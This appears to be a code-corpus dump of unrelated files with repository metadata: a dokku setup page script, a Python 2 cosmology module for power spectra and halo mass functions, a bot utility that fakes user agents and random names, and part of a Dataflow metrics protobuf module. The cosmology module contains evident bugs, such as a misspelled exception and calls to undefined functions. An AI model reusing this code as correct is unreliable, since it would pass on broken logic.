if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://progrium.viewdocs.io/dokku/application-deployment";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
mit
| 5,662,286,861,856,601,000
| 34.081818
| 208
| 0.564006
| false
| 3.497055
| false
| false
| false
|
rbiswas4/FluctuationsInCosmology
|
interfacecosmology/psutils.py
|
1
|
25544
|
#!/usr/bin/env python
#
#This is a set of wrappers designed to use methods of obtaining linear
#quantities of interest from outputs of actual programs taht do the
#calculations, like CAMB with the help of utilities for specific programs.
#
#USEFUL ROUTINES:
#
#powerspectrum: obtains the linear power spectrum of various quantities from
#---------------
# standard outputs of programs like CAMB
#sigma
#---------------
#sigmaM
#--------------
#CHANGES:
#Only assign values to cosmo as default if values from cosmo are being used
#otherwise pass as whole
#
#Fixed the spelling of filterradiusformass and its calls. Checked that the
#tests at the bottom of the file still work.
#R. Biswas, Thu Nov 14 15:31:46 CST 2013
#
#Fixed bug in function sigmaM, where filterradius is called without
#optional argument cosmo and z. The same bug was there in sigmaM (where
#it was being called without z, and derivatives of sigma and the mass
# function calculation.
#R. Biswas, Thu Nov 14 17:59:14 CST 2013
import sys
import matplotlib.pyplot as plt
import utils.typeutils as tu
import massfunctions as mf
import growthfunction
import numpy as np
import camb_utils.cambio as cio
import utils.filters as filters
verbose = False
def loginterp(xreq, xnative, ynative , left = np.nan , right = np.nan):
logxreq = np.log(xreq)
npinterp = np.interp(logxreq , np.log(xnative), np.log(ynative), left = np.nan, right = np.nan)
return np.exp(npinterp)
def critdensity(h = 1.0,
unittype = 'kgperm3') :
"""Returns the critical density today $\Omega_{crit}(z=0) as a
function of h through the formula
$10^4 h^2 (3.0/(8.0 \pi G) )) in units of kg /m^3 or solar
masses / Mpc^3 .
args:
h: float, optional, defaults to 1.0
= H0/100
unittype: string ,optional, defaults to SI
kgperm3: SI units
solarmassperMpc3: units of M_{\sun} / Mpc^3
returns:
critical density. If no argument is supplied the correct
critical density is the return times h^2
example usage:
>>> from astropy.cosmology import Planck13 as cosmo
>>> print critdensity (cosmo.h )
>>> print cosmo.critical_density0
>>> #The two above values should be same to unit definition
status:
Tested with above tests and found to work. The value of 10^{-27}
is due to the difference in units with astropy.
R. Biswas, Sun Aug 18 12:41:42 CDT 2013
BUGFIX: unittype ought to be kgmerm3 in if loop, but was
written as kmperm3. Fixed Typo.
R. Biswas, Wed Nov 13 19:22:28 CST 2013
notes :
The answer is ~ 10^{-27} while the answer in gm/cm^3 is
~10^{-30} as quoted in PDG for example.
TODO: This function will be removed to cosmodefs
"""
from astropy import units as u
from astropy import constants as ct
kmperMpc = (u.km / u.Mpc).decompose().scale
H0 = 100.0 * kmperMpc *h # in units of per sec
rhocrit = H0*H0 * 3.0 /(8.0 * np.pi * ct.G.value)
#Multiply mass in kg by convtosolmass to get mass in solar mass
convtosolmass = u.kg.to(u.solMass)
#Multiply distance in m to distance in Mpc
convtoMpc = (u.m.to(u.Mpc))
if unittype == "kgperm3" :
rhocritu = rhocrit
if unittype == "solarmassperMpc3":
rhocritu = rhocrit*convtosolmass/convtoMpc**3.0
return rhocritu
def __rhobg ( z = 0.0 , bgtype = "cb", unittype = "solarmassperMpc3",
cosmo = None):
"""returns the background density at redshift z. If bgtype = "matter"
then the function returns the background matter (CDM + Baron + massive
neutrino) density.
args:
z:
optional, float , defaults to 0.
redshift at which the background density is
calculated
bgtype :
string, optional, defaults to "matter"
choices: "matter"
"cb" : baryon - cdm
unittype :
string, optional ,defaults to "Msun/Mpc3"
defines the unit of the return
solarmassperMpc3:
Units of solar mass per Mpc cube
SI :
cosmo : w0wa cosmology
returns:
float, the background density in units of type unittype
example usage:
status:
notes:
Will change later. This exists because our definition of
matter includes neutrinos, which I want to remove later
so that matter is baryon CDM by definition.
Remove to cosmodefs.
"""
#if cosmo == None:
# from astropy.cosmology import Planck13 as cosmo
if bgtype == "matter":
Om0 = cosmo.Om0
if bgtype == "cb":
Om0 = cosmo.Ob0 + cosmo.Oc0
h = cosmo.H0 /100.
rho = critdensity(h = h, unittype = 'solarmassperMpc3')*Om0*(1.+z)**3.0
return rho
def filterradiusformass( M ,
z = 0. ,
bgtype = "cb" ,
cosmo = None):
"""
returns a radius in units of Mpc which encloses a mass M of the
homegenous density of particles specified as bgtype at the redshift
z for a cosmology cosmo.
args:
M :
mass in solar masses
z : float, defaults to 0.
redshift
bgtype : string, defaults to matter
background density to use in converting
mass to a radius
cosmo : wowa cosmology, defaults to Planck13
returns :
Radius in Mpc
"""
#if cosmo == None:
# from astropy.cosmology import Planck13 as cosmo
rhobg = __rhobg ( z , bgtype = bgtype, unittype = "solarmassperMpc3", cosmo = cosmo)
#Assume mass is made of all matter
Rcube = 3* M / rhobg /4.0 / np.pi
R = np.power (Rcube, 1.0/3.0)
return R
def powerspectrumfromfile(fname,
koverh = None ,
pstype = "matter" ,
h = 0.71 ,
ns = 0.963 ,
As = 2.1e-9 ,
Omegacdm = None ,
Omegab = None ):
"""
****************************************
DEPRECATED: USE cambio functions instead
*****************************************
returns a tuple of koverh values and the interpolated power
spectra at these values of hoverh using a CAMB output which
may be a power spectrum output or transfer function output.
If the output is a transfer function output, then ns, h,
and As must be supplied
args:
returns:
tuple of (koverh, ps values)
"""
#decide if file is transfer function or Power spectrum output
psfile = False
tffile = False
Unknown = True
tmpfile = np.loadtxt(fname)
shapetuple = np.shape(tmpfile)
if shapetuple[-1] == 7:
tffile = True
Unknown = False
if shapetuple[-1] ==2 :
psfile = True
Unknown = False
if koverh == None:
koverh = tmpfile[:,0]
if Unknown:
#file is not CAMB transfer function or power spectrum output
raise ValueError("Unknown filename supplied")
if psfile :
if pstype != "matter" :
raise ValueError ("Cannot obtain non-matter power spectrum from CAMB power spectrum file")
return (koverh , powerspectrum(koverh, fname ) )
if tffile :
if pstype == "matter" :
transfer = cio.loadtransfers(rootname = None,
filename = fname)
ps = cio.matterpowerfromtransfersforsinglespecies( koverh ,
transfer ,
h ,
As ,
ns )
return (ps [:,0], ps[:,1])
elif pstype == "cb" :
#LOST CODE HERE
return 0
def powerspectrum ( koverh ,
asciifile = None ,
pstype = "matter",
sigma8type = "matter" ,
method = "CAMBoutfile",
z = 0.0 ,
cosmo = None ,
interpmethod = 'log' ,
**params):
"""
returns linearly interpolated values of the powerspectrum in the
powerspectrumfile with k values in units of h/Mpc. Using
this with koverh = None, returns the values in the table.
args:
koverh : array-like of floats or Nonetype, mandatory
k in units of h/Mpc
asciifile: string,
Filename for power spectrum or CAMB transfer function.
power sepctrum or transfer function input will be
recognized from CAMB file structure.
cosmo : interfacecosmology/astropy cosmological model
method : string, optional , defaults to "CAMBoutfile"
Method of obtaining power spectrum with fixed options
options:
-------
CAMBoutfile :assume that the asciifile output of CAMB
is at desired redshift
CAMBoutgrowth :Use the asciifile from CAMB output at
z = 0.0 , and use a growth function to find
the power spectrum at z = z
interpmethod: string, optional, defaults to 'log'
options:
'log': linearly interpolates
log(koverh) vs log(PS) in units of h^#/Mpc^3
'linear' : linearly interpolates koverh and PS
pstype : string, optional, defaults to 'matter'
sets the way the perturbations are counted in order
to calculate the matter power spectrum, though the perturbations are evolved correctly according to the
cosmological model.
OPTIONS:
--------
'matter': Conventional matter power spectrum, as would
be calculated in CAMB, including the density
contrast for CDM, baryon and massive neutrinos
'cb' : Counts only the cDM and baryons in calculating
the matter power spectrum.
'cbmatter': Counts only the CDM and baryon fluctuations
but the entire matter (CDM + baryons + massive
neutrinos) for the background density
returns:
tuple (koverh , power spectrum)
notes: should be able to obtain the powerspectrum in a variety of
methods with code being added
Override Rules:
sigma8 overrides As
params dictionary overrides cosmo
"""
#Make sure evaluation method is implemented
if not method in ["CAMBoutfile","CAMBoutgrowth"]:
raise ValueError("Method not defined")
if method in ["CAMBoutfile", "CAMBoutgrowth"] :
#Query CAMB file type: power spectrum or transfer
psfile, tkfile, Unknown = cambasciifiletype (asciifile)
if method == "CAMBoutgrowth":
#cannot calculate growth if cosmo not provided
if cosmo == None and z >0.000001 :
raise ValueErrror("Method does not work if cosmo is not defined")
Dg = 1.0
if cosmo !=None:
if z > 0.000001:
Dg = cosmo.growth(z)[0]
# decide whether As or sigma8 is to be used
# if sigma8 provided use it, otherwise As
sigma8 = None
As = None
if params.has_key("sigma8"):
if params.sigma8 != None :
sigma8 = params["sigma8"]
if params.As != None :
As = params["As"]
if cosmo != None :
if cosmo.sigma8 != None:
if sigma8 == None:
sigma8 = cosmo.sigma8
if cosmo.As != None:
if As == None :
As = cosmo.As
#If neither As or sigma8 are provided fail!
if As == None and sigma8 == None and not psfile :
raise ValueError("without As or sigma8 provided, matter power spectrum cannot be calculated from transfer functions\n")
if sigma8 != None:
As = 1.0
if params != None:
paramdict = params
paramdict["As"] = As
#print "VALUES passed on from powerspectrum routine \n"
if verbose:
print "sigma8 = ", sigma8, " As ", cosmo.As
#print paramdict["As"], "IN powerspectrum"
pstmp = __powerspectrum ( koverh = None,
asciifile = asciifile ,
pstype = pstype ,
method = method ,
z = z ,
cosmo = cosmo ,
**paramdict )
#If sigma8 is given, we need to normalize power spectrum
#power spectrum to normalize is pssigma8
if sigma8 != None:
if pstype !=sigma8type:
if verbose:
print "evaluate sigmatype ps \n"
pssigma8 = __powerspectrum ( koverh = None,
asciifile = asciifile ,
pstype = sigma8type ,
method = method ,
z = z ,
cosmo = cosmo ,
**paramdict)
else:
pssigma8 = pstmp
if sigma8 != None :
Asrel = getAsrel (pssigma8 , sigma8, cosmo = cosmo,
filt= filters.Wtophatkspacesq, **paramdict)
#print "Now As has been determined to be ", sigma8type , Asrel
v = pstmp[0], Asrel*pstmp[1]
else :
v = pstmp
if koverh != None:
if interpmethod == "linear":
ret = koverh, np.interp(koverh, v[0], v[1],
left = np.nan , right = np.nan)
else:
interpmethod = "log"
ret = koverh, loginterp(koverh, v[0], v[1],
left = np.nan , right = np.nan)
else:
ret = v
if method == "CAMBoutgrowth" :
return ret[0],Dg*Dg*ret[1]
else:
return ret
def getvalsfromparams(cosmo, **params):
"""
TO DO
provide a general function to pass values into cosmo and params
"""
return None
def cambasciifiletype( fname ) :
# Decide whether this ia a matter or transfer file
psfile = False
tkfile = False
Unknown = True
tmpfile = np.loadtxt(fname )
shapetuple = np.shape(tmpfile)
if shapetuple[-1] == 7:
tkfile = True
Unknown = False
if shapetuple[-1] ==2 :
psfile = True
Unknown = False
if Unknown:
#file is not CAMB transfer function or power spectrum output
raise ValueError("Unknown filename supplied")
return psfile, tkfile, Unknown
def __powerspectrum ( koverh ,
asciifile = None ,
pstype = "matter",
method = "CAMBoutfile",
z = 0.0 ,
cosmo = None ,
**params):
"""
DO NOT CALL DIRECTLY. CALL powerspectrum instead
returns linearly interpolated values of the powerspectrum in the
powerspectrumfile with k values in units of h/Mpc. Using
this with koverh = None, returns the values in the table.
args:
koverh : array-like of floats or Nonetype, mandatory
k in units of h/Mpc
asciifile: string,
Filename for power spectrum or CAMB transfer function.
power sepctrum or transfer function input will be
recognized from CAMB file structure.
method : string, optional , defaults to "CAMBoutfile"
Method of obtaining power spectrum with fixed options
options:
-------
CAMBoutfile :assume that the asciifile output of CAMB
is at desired redshift
CAMBoutgrowth :Use the asciifile from CAMB output at
z = 0.0 , and use a growth function to find
the power spectrum at z = z
returns:
tuple (koverh , power spectrum)
notes: should be able to obtain the powerspectrum in a variety of
methods with code being added
"""
#ensure we are supposed to read CAMB outfiles
if not method in ["CAMBoutfile","CAMBoutgrowth"]:
raise ValueError("Method not defined")
# # Decide whether this ia a matter or transfer file
#This has been made a function
# psfile = False
# tkfile = False
# Unknown = True
#
# shapetuple = np.shape(tmpfile)
# if shapetuple[-1] == 7:
# tkfile = True
# Unknown = False
# if shapetuple[-1] ==2 :
# psfile = True
# Unknown = False
psfile, tkfile, Unknown = cambasciifiletype ( asciifile )
tmpfile = np.loadtxt(asciifile)
if koverh == None:
koverh = tmpfile[:,0]
if Unknown:
#file is not CAMB transfer function or power spectrum output
raise ValueError("Unknown filename supplied")
if psfile:
pk = cio.loadpowerspectrum(asciifile)
if not np.all(np.diff(pk[:,0])>0.):
raise ValueError("The k values in the power spectrum file are not in ascending order")
if koverh == None :
return (pk[:,0], pk[:,1])
return koverh, np.interp( koverh, pk[:,0],pk[:,1],left = np.nan, right = np.nan)
if tkfile:
#print "AS " , params["As"]
#print cosmo.Ob0, cosmo.Oc0
if pstype == "cb":
#print "filename ", asciifile
pk = cio.cbpowerspectrum ( transferfile = asciifile ,
Omegacdm = cosmo.Oc0,
Omegab = cosmo.Ob0,
h = cosmo.h,
Omeganu = cosmo.On0,
As = params["As"],
#As = cosmo.As,
ns = cosmo.ns,
koverh = None )
return (pk [:,0], pk[:,1])
if pstype == "cbmatter":
Omegam = cosmo.Om0
Omegacb = cosmo.Ob0 + cosmo.Oc0
ratiosq = (Omegacb/Omegam)**2.0
#print "filename ", asciifile
pk = cio.cbpowerspectrum ( transferfile = asciifile ,
Omegacdm = cosmo.Oc0,
Omegab = cosmo.Ob0,
h = cosmo.h,
Omeganu = cosmo.On0,
As = params["As"],
#As = cosmo.As,
ns = cosmo.ns,
koverh = None )
return (pk [:,0], pk[:,1]*ratiosq)
if pstype == "matter" :
if koverh == None :
koverh = tmpfile[:,0]
transfer = cio.loadtransfers( filename = asciifile)
transfertuple = (transfer[:,0], transfer[:,-1])
ps = cio.matterpowerfromtransfersforsinglespecies(
koverh ,
transfer = transfertuple,
h = cosmo.h ,
As = params["As"],
ns = cosmo.ns)
return (ps [:,0], ps[:,1])
return koverh, pk
def sigma(ps , R = 8 , khmin = 1e-5, khmax = 2.0, logkhint = 0.005, cosmo = None, filt = filters.Wtophatkspacesq, **params) :
"""
returns the square root of the variance of isotropic, homogeneous
fluctuations filtered with a single scale filter at a scale of
R Mpc/h.
args:
ps: tuple of koverh , power spectrum values
R : array-like float, optional defaults to 8.0
radius in units of Mpc/h over which the filtering
is done
filt: function describing the shape of the filter
default is filters.Wtophatkspacesq which is
the Fourier transform of the tophat at R Mpc/h
cosmo: cosmological model
khmin: float, optional defaults to 1e-5
min value of k/h used in evaluating the integral.
usage:
>>> pk = np.loadtxt("powerspectrum")
>>> sigma (ps = (pk[:,0],pk[:,1]), cosmo = cosmo)
"""
sigsq= sigmasq(ps = ps , R =R, khmin = khmin , khmax = khmax ,
logkhint = logkhint , cosmo=cosmo , filt = filt , **params )
return np.sqrt(sigsq )
def sigmasq (ps , R = 8. , usenative = True, khmin = 0.9e-5 , khmax = 5.0, logkhint = 0.005 ,
cosmo = None, filt= filters.Wtophatkspacesq, **params) :
"""
Returns the variance of the overdensity field smoothed at
a radius of R Mpc/h using a filter specified by filt
args:
ps: tuple of koverh, power spectrum values
R : float array like
distance scale in units of Mpc/h over which
the filtering is done
usenative: bool, optional , defaults to True
Use values provided in ps, rather than
interpolation
cosmo: Model, whose hubble constant will be used
khmin: float, value below which the integral will not be
calculated
returns :
array of sigmasq values
notes:
- We need h, even if CAMB power spectrum is given
- If interpolation is used only, and the range provided
is outside the range of the data, only those points
in the original range will be used. extrapolation
is dangerous, particularly at high k, unless it is
made to drop as a power law.
"""
import numpy as np
import scipy.integrate as si
h = cosmo.H0/100.0
if usenative :
mask = ps[1] is not np.nan
#khvals = ps[0][mask]
khvals = ps[0]
else:
logkhmin = np.log(khmin)
logkhmax = np.log(khmax)
logkh = np.arange(logkhmin, logkhmax , logkhint)
khvals = np.exp(logkh)
logkhmin = max(min(ps[0]),logkhmin)
logkhmax = min(max(ps[0]),logkhmax)
mask = khvals >= khmin
khvals = khvals[mask]
k = khvals * h
psinterp = np.interp (khvals , ps[0], ps[1], left = np.nan, right = np.nan)
#plt.loglog(khvals, psinterp, label="interp")
#plt.loglog(ps[0], ps[1], label="native")
#plt.legend(loc= "best")
#plt.show()
if tu.isiterable(R):
R = np.asarray(R)
kr = np.outer( R, khvals )
else:
kr = R* khvals
kwinsq= filt (kr, R)
#kwin = 3*(np.sin(kr)-kr*np.cos(kr))/(kr)**3
#kwinsq = kwin *kwin
ksqWsqPk = k*k *kwinsq* psinterp /2. /np.pi/ np.pi/h /h/h
sigmasq = si.simps ( ksqWsqPk, x = k, even = 'avg')
return sigmasq
def getcosmo(cosmo, cambtf_file, sigma8 = None) :
"""
returns an FCPL object with the same cosmology as cosmo, except
that the amplitude is a CMB normalized As, such that the cambtf_file
produces the input sigma8, or the cosmo.sigma8
args:
returns:
cosmo with the amplitude set correctly so that
the sigma8 values match
"""
Acosmo = cosmo
sig8 = sigma8
if sig8 is None:
sig8 = cosmo.sigma8
Acosmo.setamplitude(As =1.0, sigma8 = None)
cambtmp = powerspectrum(koverh = None, asciifile = cambtf_file,
cosmo = Acosmo )
As = getAsrel(cambtmp, sigma8 = sig8, cosmo = Acosmo)
Acosmo.setamplitude ( As = As, sigma8 = None)
return Acosmo
def getAsrel (ps , sigma8, khmin = 1.0e-5 , khmax = 2.0, logkhint = 0.005 ,
cosmo = None, filt= filters.Wtophatkspacesq, **params) :
"""
returns a relative value of As by which to multiply the power spectrum
values in order to obtain sigma8
args:
returns:
float, Asrel
"""
sigsq = sigmasq (ps , khmin= khmin, khmax =khmax,logkhint =logkhint, cosmo = cosmo, filt = filt , **params)
#print "sigma8 ", sigma8
#print "sigsq ", sigsq
Asrel = sigma8*sigma8 / sigsq
#print "Asrel in Asre", Asrel
return Asrel
def sigmaM (M ,
ps ,
bgtype = "matter",
khmin = 1.0e-5 ,
khmax = 2.0 ,
logkhint = 0.005 ,
z = 0.0 ,
cosmo = None ,
**params):
"""Returns the standard deviation of the overdensity fields
smoothed at a radius corresponding to mass M.
args:
M: array like , mandatory
mass of halo in units of solar masses
ps:
bgtype :
z = :
khmin :
cosmo :
notes:
the bgtype matters for converting Mass M to R.
Also ps must be set accordingly
"""
if tu.isiterable(M):
M = np.asarray(M)
#if cosmo == None:
# from astropy.cosmology import Planck13 as cosmo
h = cosmo.H0/100.0
R = filterradiusformass( M , bgtype= bgtype, z = z, cosmo = cosmo)
RinMpcoverh = R*h
#print "RinMpcoverh ***************"
#print RinMpcoverh
#return RinMpcoverh
return sigma( ps , R = RinMpcoverh, khmin = khmin , khmax = khmax, logkhint = logkhint , cosmo= cosmo, **params)
def dlnsigmadlnM (M ,
ps ,
bgtype = "matter",
cosmo = None ,
khmin = 1.0e-5 ,
khmax = 2.0 ,
logkhint = 0.005 ,
z = 0.0 ,
**params ) :
"""
returns the derivative dln (\sigma^{-1})/ d ln M at values of M by
args:
M: array-like, mandatory
mass of halo in units of solar mass
ps : tuple, mandatory
(koverh , ps)
z : Redshift. SHOULD ALWAYS BE SET TO 0. left for historical
reasons.
notes:
dln(\sigma^{-1})/dln M = M /sigma^{-1}* (-1.)\sigma^{-2}* d sigma /dR dR/dM
Done by calculating 1/sigma * dsigma /dR * dR /d ln M ,
where dsigma / dR = sigma with derivative of filter
"""
sig = sigmaM (M , ps , khmin = khmin ,
khmax = khmax ,
logkhint = logkhint ,
z = z ,
bgtype = bgtype ,
cosmo = cosmo ,
**params)
h = cosmo.h
R = filterradiusformass( M , bgtype = bgtype, z = 0, cosmo = cosmo)
dlnRdlnM = 1.0/3.0
RinMpcoverh = R*h
#d ln sigma /d ln R = d ln sigma^2 / d ln R / sigma^2/ 2.0
#sigmasq with filter of dWtophatkspacesqdlnR
# is dln sigma^2/ d ln R
dlnsigdlnR = sigmasq (R = RinMpcoverh , ps = ps, z = z ,
bgtype = bgtype, filt = filters.dWtophatkspacesqdlnR, cosmo = cosmo , khmin = khmin ,
khmax = khmax , logkhint = logkhint, **params )/sig/ sig/2.0
#return sig
return dlnsigdlnR *dlnRdlnM
def dndlnM ( M ,
ps ,
z = 0. ,
khmin = 1.0e-5,
khmax = 2.0 ,
logkhint = 0.005 ,
bgtype = "matter",
powerspectrumfile = "LCDM_matterpower.dat" ,
cosmo = None,
deltac = 1.674 ,
**params ):
"""
returns the mass function dn/dln(M) in units of h^3 Mpc^{-3}
args:
M: mandatory, arraylike
mass bin in units of solar Mass
powerspectrumfile : optional, string, defaults to
LCDM_matterpower.dat
name of the power spectrum file from CAMB
cosmo: optional defaults to Planck13
cosmology model
returns:
numpy array containing mass function in units of Mpc^{-3}
CHANGES:
added argument deltac with default value 1.674
"""
h = cosmo.H0/100.0
#rhocr = critdensity( h = h ,
# unittype = "solarmassperMpc3")
sig = sigmaM (M ,
ps ,
bgtype = bgtype,
khmin = khmin ,
khmax = khmax ,
logkhint = logkhint ,
z = z,
cosmo = cosmo ,
**params)
dlsinvdlM = -dlnsigmadlnM (M ,
ps ,
z = z ,
bgtype = bgtype ,
cosmo = cosmo ,
khmin = khmin ,
khmax = khmax ,
logkhint = logkhint ,
**params )
f_sigma = mf.__fsigmaBhattacharya (
sigma = sig,
deltac = deltac ,
z = z ,
A0 = 0.333 ,
a0 = 0.788 ,
p0 = 0.807 ,
q0 = 1.795 ,
alpha1 = 0.11 ,
alpha2 = 0.01 ,
alpha3 = 0.0 ,
alpha4 = 0.0,
Mlow = 6e11 ,
Mhigh = 3e15)
rhobg = __rhobg( z =z , bgtype = bgtype,
unittype = "solarmassperMpc3", cosmo = cosmo)
dndlnM = rhobg *f_sigma *dlsinvdlM /M
#dndlnM = dlsinvdlM *f_sigma/M * rhobg
#critdensity(h = cosmo.h, unittype = "solarmassperMpc3")*cosmo.Om0
return dndlnM
if __name__=="__main__":
import numpy as np
import matplotlib.pyplot as plt
import camb_utils.cambio as cio
import sys
#pk = cio.loadpowerspectrum ("example_data/LCDM_def_matterpower.dat")
pk = cio.loadpowerspectrum ("LCDM_matterpower.dat")
ts = cio.loadtransfers(filename = "example_data/LCDM_def_transfer_out.dat")
#print np.shape(ts)
#print pk[:,0]
pkt = cio.matterpowerfromtransfersforsinglespecies(koverh = pk[:,0],
transfer = (ts[:,0],ts[:,-1]), h = 0.71, As = 2.1e-9, ns = 0.963)
plt.loglog ( pk[:,0], pk[:,1])
plt.loglog ( pkt[:,0], pkt[:,1])
plt.figure()
from astropy.cosmology import Planck13 as cosmo
#print sigma(ps = (pk[:,0],pk[:,1]) , R = 8.0, cosmo = cosmo)
#plt.show()
sys.exit()
M = 10.**(np.arange(7,16,0.2))
R = np.arange(0.0005, 50.0,0.1)
#R = np.array([4,8,12])
#print sigma (8.0)
plt.figure()
plt.plot(R, sigma(R))
plt.xlabel("R ( Mpc /h )")
plt.ylabel(r'$\sigma (R)$')
plt.figure()
plt.plot(M ,filterradiusformass(M))
plt.xscale('log')
plt.xlabel("M ")
plt.ylabel(r'$R(M) Mpc $')
plt.figure()
plt.plot ( M, sigmaM(M, powerspectrumfile = "LCDM_def_matterpower.dat"), "o")
plt.plot ( M, 1./sigmaM(M,powerspectrumfile = "LCDM_def_matterpower.dat"),'o')
plt.xlabel("M ")
plt.ylabel(r'$\sigma (M)$')
plt.xscale('log')
plt.figure()
plt.plot ( M[1:-1], dlninvsigmaMdlnM (M ),"o")
plt.xlabel(r'$M (M_\odot$')
plt.ylabel(r'$\frac{d ln \sigma^{-1}}{d ln(M)}$')
plt.xscale('log')
plt.tight_layout()
plt.savefig("dlninvsigmadlnM,pdf")
plt.figure()
#plt.plot (1./ sigmaM(M[1:-1]), dndlnM (M ), "o")
plt.plot (M[1:-1], dndlnM (M ), "o")
plt.xscale('log')
plt.yscale('log')
plt.show()
#print filterradiusformass ( M =
#plt.show()
|
mit
| -3,501,540,544,829,631,000
| 24.672362
| 127
| 0.65393
| false
| 2.754664
| false
| false
| false
|
necroguemancer/google-play-discord-bot
|
utils.py
|
1
|
1935
|
from time import sleep, strftime
from datetime import datetime
# from requests.packages.urllib3.exceptions import InsecureRequestWarning
import requests, random
try:
from faker import Faker
fake = Faker()
except Exception:
print("Run \"pip install Faker\" using the correct pip path and you should be fine.")
# import sys; sys.exit(1)
def string_to_dict(headers):
headers_dict = {}
for line in headers.split("\n"):
if not line: continue
line = line.strip()
key, *values = line.split(" ")
key = key[:-1]
if not (key and values): continue
headers_dict[key] = " ".join(values)
return headers_dict
def get_time():
return "[" + strftime("%m/%d %H:%M:%S") + "]"
def dump(r):
with open("dump.html", "w") as f:
f.write(str(r))
def clean(text):
return ''.join([i if ord(i) < 128 else ' ' for i in text])
class ThreadManager(object):
"""docstring for ThreadManager"""
def __init__(self, MAX_THREADS = 30, MESSAGES = False, TIME = True):
super(ThreadManager, self).__init__()
self.MAX_THREADS = MAX_THREADS
self.MESSAGES = MESSAGES
self.TIME = TIME
self.threads = []
def load(self, thread):
self.threads.append(thread)
def clear(self):
self.threads = []
def start(self):
start_time = datetime.now()
THREAD_COUNT = 0
for t in self.threads:
t.daemon = True
t.start()
THREAD_COUNT += 1
if THREAD_COUNT >= self.MAX_THREADS:
if self.MESSAGES:
print("Waiting for a thread to end.")
t.join()
if self.MESSAGES:
print("Starting a new thread now.")
THREAD_COUNT -= 1
if self.MESSAGES:
print("Waiting for all threads to end.")
for t in self.threads:
t.join()
if self.TIME:
print(datetime.now() - start_time)
def get_user_agent():
return fake.user_agent()
def get_random_name():
return "{}{}{}".format(fake.first_name(), fake.last_name(), random.randint(1, 100))
# requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
gpl-3.0
| 4,605,339,655,682,512,000
| 23.493671
| 86
| 0.663049
| false
| 3.042453
| false
| false
| false
|
googleapis/python-dataflow-client
|
google/cloud/dataflow_v1beta3/types/metrics.py
|
1
|
16973
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import struct_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.dataflow.v1beta3",
manifest={
"ExecutionState",
"MetricStructuredName",
"MetricUpdate",
"GetJobMetricsRequest",
"JobMetrics",
"GetJobExecutionDetailsRequest",
"ProgressTimeseries",
"StageSummary",
"JobExecutionDetails",
"GetStageExecutionDetailsRequest",
"WorkItemDetails",
"WorkerDetails",
"StageExecutionDetails",
},
)
class ExecutionState(proto.Enum):
r"""The state of some component of job execution."""
EXECUTION_STATE_UNKNOWN = 0
EXECUTION_STATE_NOT_STARTED = 1
EXECUTION_STATE_RUNNING = 2
EXECUTION_STATE_SUCCEEDED = 3
EXECUTION_STATE_FAILED = 4
EXECUTION_STATE_CANCELLED = 5
class MetricStructuredName(proto.Message):
r"""Identifies a metric, by describing the source which generated
the metric.
Attributes:
origin (str):
Origin (namespace) of metric name. May be
blank for user-define metrics; will be
"dataflow" for metrics defined by the Dataflow
service or SDK.
name (str):
Worker-defined metric name.
context (Sequence[google.cloud.dataflow_v1beta3.types.MetricStructuredName.ContextEntry]):
Zero or more labeled fields which identify the part of the
job this metric is associated with, such as the name of a
step or collection.
For example, built-in counters associated with steps will
have context['step'] = . Counters associated with
PCollections in the SDK will have context['pcollection'] = .
"""
origin = proto.Field(proto.STRING, number=1,)
name = proto.Field(proto.STRING, number=2,)
context = proto.MapField(proto.STRING, proto.STRING, number=3,)
class MetricUpdate(proto.Message):
r"""Describes the state of a metric.
Attributes:
name (google.cloud.dataflow_v1beta3.types.MetricStructuredName):
Name of the metric.
kind (str):
Metric aggregation kind. The possible metric
aggregation kinds are "Sum", "Max", "Min",
"Mean", "Set", "And", "Or", and "Distribution".
The specified aggregation kind is case-
insensitive.
If omitted, this is not an aggregated value but
instead a single metric sample value.
cumulative (bool):
True if this metric is reported as the total
cumulative aggregate value accumulated since the
worker started working on this WorkItem. By
default this is false, indicating that this
metric is reported as a delta that is not
associated with any WorkItem.
scalar (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for
aggregation kinds "Sum", "Max", "Min", "And",
and "Or". The possible value types are Long,
Double, and Boolean.
mean_sum (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for the "Mean" aggregation
kind. This holds the sum of the aggregated values and is
used in combination with mean_count below to obtain the
actual mean aggregate value. The only possible value types
are Long and Double.
mean_count (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for the "Mean" aggregation
kind. This holds the count of the aggregated values and is
used in combination with mean_sum above to obtain the actual
mean aggregate value. The only possible value type is Long.
set_ (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for the "Set"
aggregation kind. The only possible value type
is a list of Values whose type can be Long,
Double, or String, according to the metric's
type. All Values in the list must be of the
same type.
distribution (google.protobuf.struct_pb2.Value):
A struct value describing properties of a
distribution of numeric values.
gauge (google.protobuf.struct_pb2.Value):
A struct value describing properties of a
Gauge. Metrics of gauge type show the value of a
metric across time, and is aggregated based on
the newest value.
internal (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for internal
use by the Dataflow service.
update_time (google.protobuf.timestamp_pb2.Timestamp):
